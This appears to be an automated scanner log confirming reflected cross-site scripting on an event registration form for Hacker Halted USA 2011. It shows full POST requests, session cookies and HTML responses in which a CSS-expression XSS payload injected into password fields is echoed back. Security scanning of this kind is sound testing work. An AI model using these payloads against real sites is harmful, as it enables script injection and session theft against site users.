color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="33%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="preload_category" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="-1" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><input type="hidden" name="discountcode" value="3" /><!--Array( [catpass65407] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><table cellspacing="0" cellpadding="2" class="standard"><tr><td colspan="2" ><br /><b>Please select from the following options:</b><font class="red">*</font><br /><br /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65410" name="selectcategoryid" alt="category" value="65410" onclick="altercost(0.00);closeallpass();" /></td><td><label for="c65410">Training Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65409" name="selectcategoryid" alt="category" value="65409" onclick="altercost(1299.00);closeallpass();" /></td><td><label for="c65409">Conference Pass Only</label> $1,299.00 </td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65415" name="selectcategoryid" alt="category" value="65415" onclick="altercost(899.00);closeallpass();" /></td><td><label for="c65415">Conference Pass (ECC Member ONLY)</label> $899.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65415&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65419" name="selectcategoryid" alt="category" value="65419" onclick="altercost(399.00);closeallpass();document.getElementById('pass65419').style.display='';" /></td><td><label for="c65419">Academic (Limited to 100)</label> $399.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65419&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65419" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65419]" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65420" name="selectcategoryid" alt="category" value="65420" onclick="altercost(0.00);closeallpass();document.getElementById('pass65420').style.display='';" /></td><td><label for="c65420">Exhibition Only Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65420&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65420" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65420]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65413" name="selectcategoryid" alt="category" value="65413" onclick="altercost(0.00);closeallpass();document.getElementById('pass65413').style.display='';" /></td><td><label for="c65413">Press/ Media Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65413&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65413" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65413]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65411" name="selectcategoryid" alt="category" value="65411" onclick="altercost(0.00);closeallpass();document.getElementById('pass65411').style.display='';" /></td><td><label for="c65411">Presenter / Trainer</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65411&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65411" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65411]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65421" name="selectcategoryid" alt="category" value="65421" onclick="altercost(0.00);closeallpass();document.getElementById('pass65421').style.display='';" /></td><td><label for="c65421">Sponsors/ Exhibitors Pass</label> </td></tr><tr id="pass65421" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65421]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65407" name="selectcategoryid" alt="category" value="65407" onclick="altercost(0.00);closeallpass();document.getElementById('pass65407').style.display='';" checked="checked" /></td><td><label for="c65407">Crew</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65407&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65407" ><td width="175" align="right" class="red">Password<font class="red">*</font></td><td><input type="password" name="catpassword[65407]" value="3" size="60" autocomplete="off" /></td></tr></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {document.getElementById('pass65419').style.display='none';document.getElementById('pass65420').style.display='none';document.getElementById('pass65413').style.display='none';document.getElementById('pass65411').style.display='none';document.getElementById('pass65421').style.display='none';document.getElementById('pass65407').style.display='none';}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST preload_category
eventid POST 19301
categoryid POST -1
language POST eng
reference POST 3
eb POST 3
admin POST -1
bridgeid POST 3
discountcode POST 3
catpassword[65419] POST 3
catpassword[65420] POST " stYle="x:expre/**/ssion(alert(9))
catpassword[65413] POST 3
catpassword[65411] POST 3
catpassword[65421] POST 3
selectcategoryid POST 65407
catpassword[65407] POST 3
x POST 0
y POST 0 -----------------------------7db58107a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=f9891a393328438ab2fe29bc2134673b
Host: www.eiseverywhere.com
Cookie: PHPSESSID=4v6m76svkgnnjt64tgo35hbip7; regtoken=m1qlka3oga4uvr88534o0af0v3
Content-Length: 1820
Accept-Encoding: gzip, deflate

--f9891a393328438ab2fe29bc2134673b
Content-Disposition: form-data; name="action"

preload_category
--f9891a393328438ab2fe29bc2134673b
Content-Disposition: form-data; name="eventid"

19301
--f9891a393328438ab2fe29bc2134673b
Content-Disposition: form-data; name="categoryid"

-1
--f9891a393328438ab2fe29bc2134673b
Content-Disposition: form-data; name="language"

eng
--f9891a393328438ab2fe29bc2134673b
Content-Disposition: form-data; name="reference"

3
--f9891a393328438ab2fe29bc2134673b
Content-Disposition: form-data; name="eb"

3
--f9891a393328438ab2fe29bc2134673b
Content-Disposition: form-data; name="admin"

-1
--f9891a393328438ab2fe29bc2134673b
Content-Disposition: form-data; name="bridgeid"

3
--f9891a393328438ab2fe29bc2134673b
Content-Disposition: form-data; name="discountcode"

3
--f9891a393328438ab2fe29bc2134673b
Content-Disposition: form-data; name="catpassword[65419]"

3
--f9891a393328438ab2fe29bc2134673b
Content-Disposition: form-data; name="catpassword[65420]"

" stYle="x:expre/**/ssion(netsparker(9))
--f9891a393328438ab2fe29bc2134673b
Content-Disposition: form-data; name="catpassword[65413]"

3
--f9891a393328438ab2fe29bc2134673b
Content-Disposition: form-data; name="catpassword[65411]"

3
--f9891a393328438ab2fe29bc2134673b
Content-Disposition: form-data; name="catpassword[65421]"

3
--f9891a393328438ab2fe29bc2134673b
Content-Disposition: form-data; name="selectcategoryid"

65407
--f9891a393328438ab2fe29bc2134673b
Content-Disposition: form-data; name="catpassword[65407]"

3
--f9891a393328438ab2fe29bc2134673b
Content-Disposition: form-data; name="x"

0
--f9891a393328438ab2fe29bc2134673b
Content-Disposition: form-data; name="y"

0
-----------------------------7db58107a156e--
--f9891a393328438ab2fe29bc2134673b--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:27:20 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3413
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="33%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="preload_category" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="-1" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><input type="hidden" name="discountcode" value="3" /><!--Array( [catpass65407] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><table cellspacing="0" cellpadding="2" class="standard"><tr><td colspan="2" ><br /><b>Please select from the following options:</b><font class="red">*</font><br /><br /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65410" name="selectcategoryid" alt="category" value="65410" onclick="altercost(0.00);closeallpass();" /></td><td><label for="c65410">Training Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65409" name="selectcategoryid" alt="category" value="65409" onclick="altercost(1299.00);closeallpass();" /></td><td><label for="c65409">Conference Pass Only</label> $1,299.00 </td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65415" name="selectcategoryid" alt="category" value="65415" onclick="altercost(899.00);closeallpass();" /></td><td><label for="c65415">Conference Pass (ECC Member ONLY)</label> $899.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65415&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65419" name="selectcategoryid" alt="category" value="65419" onclick="altercost(399.00);closeallpass();document.getElementById('pass65419').style.display='';" /></td><td><label for="c65419">Academic (Limited to 100)</label> $399.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65419&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65419" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65419]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65420" name="selectcategoryid" alt="category" value="65420" onclick="altercost(0.00);closeallpass();document.getElementById('pass65420').style.display='';" /></td><td><label for="c65420">Exhibition Only Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65420&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65420" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65420]" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65413" name="selectcategoryid" alt="category" value="65413" onclick="altercost(0.00);closeallpass();document.getElementById('pass65413').style.display='';" /></td><td><label for="c65413">Press/ Media Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65413&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65413" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65413]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65411" name="selectcategoryid" alt="category" value="65411" onclick="altercost(0.00);closeallpass();document.getElementById('pass65411').style.display='';" /></td><td><label for="c65411">Presenter / Trainer</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65411&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65411" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65411]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65421" name="selectcategoryid" alt="category" value="65421" onclick="altercost(0.00);closeallpass();document.getElementById('pass65421').style.display='';" /></td><td><label for="c65421">Sponsors/ Exhibitors Pass</label> </td></tr><tr id="pass65421" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65421]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65407" name="selectcategoryid" alt="category" value="65407" onclick="altercost(0.00);closeallpass();document.getElementById('pass65407').style.display='';" checked="checked" /></td><td><label for="c65407">Crew</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65407&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65407" ><td width="175" align="right" class="red">Password<font class="red">*</font></td><td><input type="password" name="catpassword[65407]" value="3" size="60" autocomplete="off" /></td></tr></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {document.getElementById('pass65419').style.display='none';document.getElementById('pass65420').style.display='none';document.getElementById('pass65413').style.display='none';document.getElementById('pass65411').style.display='none';document.getElementById('pass65421').style.display='none';document.getElementById('pass65407').style.display='none';}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST preload_category
eventid POST 19301
categoryid POST -1
language POST eng
reference POST 3
eb POST 3
admin POST -1
bridgeid POST 3
discountcode POST 3
catpassword[65419] POST 3
catpassword[65420] POST 3
catpassword[65413] POST " stYle="x:expre/**/ssion(alert(9))
catpassword[65411] POST 3
catpassword[65421] POST 3
selectcategoryid POST 65407
catpassword[65407] POST 3
x POST 0
y POST 0 -----------------------------7db58107a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=5bfbe95371a847e59d06b7818fa663af
Host: www.eiseverywhere.com
Cookie: PHPSESSID=4v6m76svkgnnjt64tgo35hbip7; regtoken=ajc8a9nm1ll6a0j47u7r6m6p02
Content-Length: 1820
Accept-Encoding: gzip, deflate

--5bfbe95371a847e59d06b7818fa663af
Content-Disposition: form-data; name="action"

preload_category
--5bfbe95371a847e59d06b7818fa663af
Content-Disposition: form-data; name="eventid"

19301
--5bfbe95371a847e59d06b7818fa663af
Content-Disposition: form-data; name="categoryid"

-1
--5bfbe95371a847e59d06b7818fa663af
Content-Disposition: form-data; name="language"

eng
--5bfbe95371a847e59d06b7818fa663af
Content-Disposition: form-data; name="reference"

3
--5bfbe95371a847e59d06b7818fa663af
Content-Disposition: form-data; name="eb"

3
--5bfbe95371a847e59d06b7818fa663af
Content-Disposition: form-data; name="admin"

-1
--5bfbe95371a847e59d06b7818fa663af
Content-Disposition: form-data; name="bridgeid"

3
--5bfbe95371a847e59d06b7818fa663af
Content-Disposition: form-data; name="discountcode"

3
--5bfbe95371a847e59d06b7818fa663af
Content-Disposition: form-data; name="catpassword[65419]"

3
--5bfbe95371a847e59d06b7818fa663af
Content-Disposition: form-data; name="catpassword[65420]"

3
--5bfbe95371a847e59d06b7818fa663af
Content-Disposition: form-data; name="catpassword[65413]"

" stYle="x:expre/**/ssion(netsparker(9))
--5bfbe95371a847e59d06b7818fa663af
Content-Disposition: form-data; name="catpassword[65411]"

3
--5bfbe95371a847e59d06b7818fa663af
Content-Disposition: form-data; name="catpassword[65421]"

3
--5bfbe95371a847e59d06b7818fa663af
Content-Disposition: form-data; name="selectcategoryid"

65407
--5bfbe95371a847e59d06b7818fa663af
Content-Disposition: form-data; name="catpassword[65407]"

3
--5bfbe95371a847e59d06b7818fa663af
Content-Disposition: form-data; name="x"

0
--5bfbe95371a847e59d06b7818fa663af
Content-Disposition: form-data; name="y"

0
-----------------------------7db58107a156e--
--5bfbe95371a847e59d06b7818fa663af--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:27:36 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3411
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="33%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td 